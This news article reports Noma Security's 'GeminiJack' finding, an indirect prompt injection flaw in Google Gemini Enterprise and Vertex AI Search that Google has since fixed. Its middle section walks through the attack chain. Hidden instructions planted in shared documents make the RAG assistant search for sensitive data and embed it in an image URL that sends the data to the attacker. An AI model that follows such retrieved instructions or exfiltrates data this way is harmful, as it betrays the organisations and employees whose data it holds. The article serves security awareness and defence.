Corporate data is under siege, and this time, the threat comes from an unexpected source: AI assistants. A recently discovered flaw in Google’s Gemini Enterprise could have silently siphoned sensitive information from businesses without anyone clicking a single link. But here’s where it gets even more alarming: this isn’t just a one-off issue—it’s a wake-up call about the growing risks of indirect prompt injection in corporate AI systems.
In June 2025, security researchers at Noma Security uncovered a critical vulnerability they dubbed ‘GeminiJack.’ This architectural weakness affected Google Gemini Enterprise, a suite of AI-powered tools for businesses, and Vertex AI Search, a Google Cloud platform for building AI-driven search experiences. The flaw allowed attackers to inject malicious instructions into everyday documents like emails, calendars, and Google Docs, tricking the AI into leaking corporate data without triggering any security alerts.
And this is the part most people miss: the attack didn’t require any interaction from employees. All it took was a cleverly crafted document containing hidden instructions. Here’s how the attack chain unfolded:
- Content Poisoning: An attacker creates an innocent-looking document, email, or calendar event with embedded instructions for Gemini Enterprise to search for sensitive terms and embed results in a malicious image URL.
- Trigger: An unsuspecting employee performs a routine search, unknowingly activating the AI to process the attacker’s poisoned content.
- AI Execution: Gemini retrieves the attacker’s document, misinterprets the instructions as legitimate, and scans authorized data sources for sensitive information.
- Exfiltration: The AI includes the attacker’s malicious image tag in its response. When loaded, the victim’s browser sends the stolen data to the attacker’s server via a standard HTTP request, bypassing traditional security measures.
This exploit worked because Gemini Enterprise’s search feature uses a Retrieval-Augmented Generation (RAG) architecture, which allows organizations to query multiple data sources within Google Workspace. But here’s the controversial part: while RAG enhances AI capabilities, it also expands the attack surface. As Noma Security researchers explained, ‘Organizations must pre-configure which data sources the RAG system can access, creating a persistent trust boundary. Attackers exploit this boundary by planting malicious instructions within content retrieved by the AI.’
Noma Security released a detailed proof-of-concept (PoC) exploit for GeminiJack in their December 8 report, highlighting the urgency of addressing this vulnerability. Google, to its credit, acted swiftly. After receiving the report in August, the tech giant updated Gemini Enterprise and Vertex AI Search, altering how they interact with retrieval and indexing systems. Vertex AI Search was also fully separated from Gemini Enterprise, eliminating shared workflows and RAG capabilities.
However, Noma Security warns that this won’t be the last attack of its kind. Traditional security tools like perimeter defenses and data loss prevention systems are ill-equipped to detect AI-driven exfiltration. As AI assistants gain more access to corporate data, the potential damage from a single vulnerability grows exponentially. Organizations must rethink trust boundaries, implement robust monitoring, and stay informed about emerging AI security threats.
The UK’s National Cyber Security Centre (NCSC) recently issued new guidance on mitigating prompt injection attacks, underscoring the need for proactive measures. But the question remains: Are businesses ready to adapt their security strategies for an AI-driven threat landscape? Let us know your thoughts in the comments—do you think traditional security tools are enough, or is a complete overhaul necessary?
